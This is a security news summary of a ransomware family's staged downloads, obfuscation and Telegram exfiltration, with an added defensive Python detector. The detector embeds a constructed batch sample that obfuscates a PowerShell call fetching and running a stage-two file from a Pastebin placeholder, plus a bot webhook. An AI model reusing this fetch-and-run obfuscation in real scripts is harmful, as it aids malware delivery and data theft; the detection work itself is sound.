Trend Micro has been analyzing a series of CMD-based ransomware variants with increasingly sophisticated features. YourCyanide is the latest in this lineage, which began with GonnaCope.
Diving into details
YourCyanide integrates Pastebin, Microsoft documents, and Discord links as part of its payload download mechanism.
Under multiple obfuscation layers, the ransomware leverages custom environment variables, as well as the EnableDelayedExpansion feature of the Windows command interpreter, to evade detection.
It furthermore chains through several stages, downloading successive files via Pastebin and Discord before fetching the final payload, which keeps its activity hidden.
As the ransomware is still under active development, it doesn’t encrypt anything.
It uses the Telegram chatbot API to exfiltrate pilfered information, storing the endpoint in a variable named ‘webhook’.
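A defender-side triage heuristic for this kind of script, added here as an example and not code from Trend Micro's analysis: it scans a CMD/BAT file for the markers described above (EnableDelayedExpansion, strings rebuilt from custom environment variables with !var! expansion, Pastebin and Discord download links, a Telegram bot API endpoint) and flags the combination. The sample script, the pattern names and the scoring thresholds are constructed assumptions, not values taken from the actual samples.

```python
import re
from collections import Counter

# Constructed sample in the style the write-up describes: delayed expansion,
# custom environment variables that rebuild a command string, and staged
# downloads from paste/chat services. URLs are placeholders, not real IoCs.
SAMPLE_CMD = r"""
@echo off
setlocal EnableDelayedExpansion
set a=pow&set b=ers&set c=hell
set url1=https://pastebin.com/raw/PLACEHOLDER
set url2=https://cdn.discordapp.com/attachments/0/0/PLACEHOLDER.bat
set webhook=https://api.telegram.org/botPLACEHOLDER/sendMessage
!a!!b!!c! -c "iwr !url1! -OutFile stage2.bat"
call stage2.bat
"""

# Indicator patterns a defender would look for in a CMD/BAT file (assumed names).
PATTERNS = {
    "delayed_expansion": r"(?i)setlocal\s+EnableDelayedExpansion",
    "bang_expansion":    r"![A-Za-z_][A-Za-z0-9_]*!",
    "percent_expansion": r"%[A-Za-z_][A-Za-z0-9_]*%",
    # several short "set x=..." fragments chained with & on one line
    "chained_set":       r"(?i)\bset\s+\w+=[^&\r\n]{1,4}(?:&\s*set\s+\w+=[^&\r\n]{1,4})+",
    "pastebin_url":      r"(?i)https?://(?:www\.)?pastebin\.com/",
    "discord_url":       r"(?i)https?://(?:cdn\.)?discord(?:app)?\.com/",
    "telegram_bot_api":  r"(?i)https?://api\.telegram\.org/bot",
}

def scan_cmd_script(text: str) -> Counter:
    """Count hits for each indicator pattern in a CMD/BAT script body."""
    return Counter({name: len(re.findall(rx, text)) for name, rx in PATTERNS.items()})

def triage(text: str) -> dict:
    """Coarse verdict: download/exfil infrastructure combined with obfuscation
    markers is what distinguishes this family from an ordinary admin script."""
    hits = scan_cmd_script(text)
    infra = sum(hits[k] for k in ("pastebin_url", "discord_url", "telegram_bot_api"))
    obf = sum(int(c) for c in (hits["delayed_expansion"] > 0,
                               hits["chained_set"] > 0,
                               hits["bang_expansion"] >= 3))
    return {"hits": dict(hits), "score": infra + obf,
            "suspicious": infra >= 1 and obf >= 2}

if __name__ == "__main__":
    print(triage(SAMPLE_CMD))
```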
Why this matters
While no encryption is performed, YourCyanide renames files, thus inconveniencing users.
Moreover, as this ransomware is still being developed, the developers are finalizing the encryption routine.
It can also propagate via email and to other drives.
Variant comparison
The earliest version of YourCyanide, dubbed GonnaCope, was first spotted in April.
One prominent difference between the two variants is that GonnaCope does not harvest user credentials from a list of applications and web browsers, and does not enable RDP connections.
In addition, the earliest version does not execute black.bat, the file responsible for making the machine temporarily inaccessible while the payload is executed.
The bottom line
CMD-based ransomware strains are using heavily obfuscated scripts, resulting in low detection rates. While the technique is not new, the use of multi-layered obfuscation mechanisms allows the malware to hide easily. Ransomware strains with advanced capabilities are gaining popularity among cybercriminals. While YourCyanide has not yet emerged as a serious threat, further developments need to be tracked and blocked before they cause severe repercussions.